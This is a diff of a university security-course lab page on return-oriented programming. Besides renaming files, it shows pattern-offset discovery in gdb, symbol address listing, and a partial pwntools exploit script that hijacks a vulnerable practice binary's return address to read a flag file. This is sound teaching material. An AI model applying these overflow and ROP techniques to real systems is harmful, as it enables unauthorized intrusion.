This shows you the differences between two versions of the page.
cns:labs:lab-09 [2020/12/14 16:39] mihai.dumitru2201 [Supporting files] |
cns:labs:lab-09 [2022/12/05 13:36] (current) mihai.dumitru2201 [Tasks] |
||
---|---|---|---|
Line 1: | Line 1: | ||
- | ====== Lab 09 - Return Oriented Programming (Part 2) ====== | + | ====== Lab 09 - Return-Oriented Programming (Part 2) ====== |
- | + | ||
- | ===== Resources ===== | + | |
- | + | ||
- | * [[http://neilscomputerblog.blogspot.ro/2012/06/stack-pivoting.html|More about stack pivoting and creating a "fake stack"]] | + | |
===== Introduction ===== | ===== Introduction ===== | ||
Line 34: | Line 29: | ||
===== Tasks ===== | ===== Tasks ===== | ||
+ | |||
+ | All content necessary for the CNS laboratory tasks can be found in [[cns:resources:repo|the CNS public repository]]. | ||
+ | |||
+ | |||
==== 1. Return to main ==== | ==== 1. Return to main ==== | ||
- | Inspect the source file ''task1.c''. See if you can spot the vulnerability. | + | Inspect the source file ''ret_to_main.c''. See if you can spot the vulnerability. |
The goal of the task is to get the contents of the ''flag'' file through the binary. In order to do this, we need to chain three functions together. | The goal of the task is to get the contents of the ''flag'' file through the binary. In order to do this, we need to chain three functions together. | ||
Line 44: | Line 43: | ||
<code asm> | <code asm> | ||
- | # gdb ./task1 | + | # gdb ./ret_to_main |
gdb-peda$ pattc 0x40 | gdb-peda$ pattc 0x40 | ||
'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAH' | 'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAH' | ||
gdb-peda$ r | gdb-peda$ r | ||
- | Starting program: /cns/lab-11/sol/task1 | + | Starting program: /cns/lab-11/sol/ret_to_main |
Welcome to our Retired Old Programmers message board! | Welcome to our Retired Old Programmers message board! | ||
Please leave a message: | Please leave a message: | ||
Line 100: | Line 99: | ||
</code> | </code> | ||
- | Our $rbp is at offset 48 => the return address will be at offset 56. | + | Our ''$rbp'' is at offset 48 => the return address will be at offset 56. |
=== Tutorial: Opening the flag file and returning to main === | === Tutorial: Opening the flag file and returning to main === | ||
Line 112: | Line 111: | ||
We'll need to save a few useful addresses: | We'll need to save a few useful addresses: | ||
<code bash> | <code bash> | ||
- | # nm task1 | egrep "main|stop|right|there|play" | + | # nm ret_to_main | egrep "main|stop|right|there|play" |
| | ||
00000000004012b5 T main | 00000000004012b5 T main | ||
Line 128: | Line 127: | ||
from pwn import * | from pwn import * | ||
- | io = process('./task1') | + | io = process('./ret_to_main') |
# Useful values | # Useful values | ||
Line 158: | Line 157: | ||
<code bash> | <code bash> | ||
# ./test.py | # ./test.py | ||
- | [+] Starting local process './task1': Done | + | [+] Starting local process './ret_to_main': Done |
[*] Switching to interactive mode | [*] Switching to interactive mode | ||
-> secret vault opened | -> secret vault opened | ||
Line 164: | Line 163: | ||
Please leave a message: | Please leave a message: | ||
$ | $ | ||
- | [*] Stopped program './task1' | + | [*] Stopped program './ret_to_main' |
</code> | </code> | ||
Line 323: | Line 322: | ||
Now you are set to write a fully working ropchain to sequentially call the three functions in order to open, read and print the contents of the flag file. | Now you are set to write a fully working ropchain to sequentially call the three functions in order to open, read and print the contents of the flag file. | ||
+ | ===== Resources ===== | ||
+ | |||
+ | * [[http://neilscomputerblog.blogspot.ro/2012/06/stack-pivoting.html|More about stack pivoting and creating a "fake stack"]] |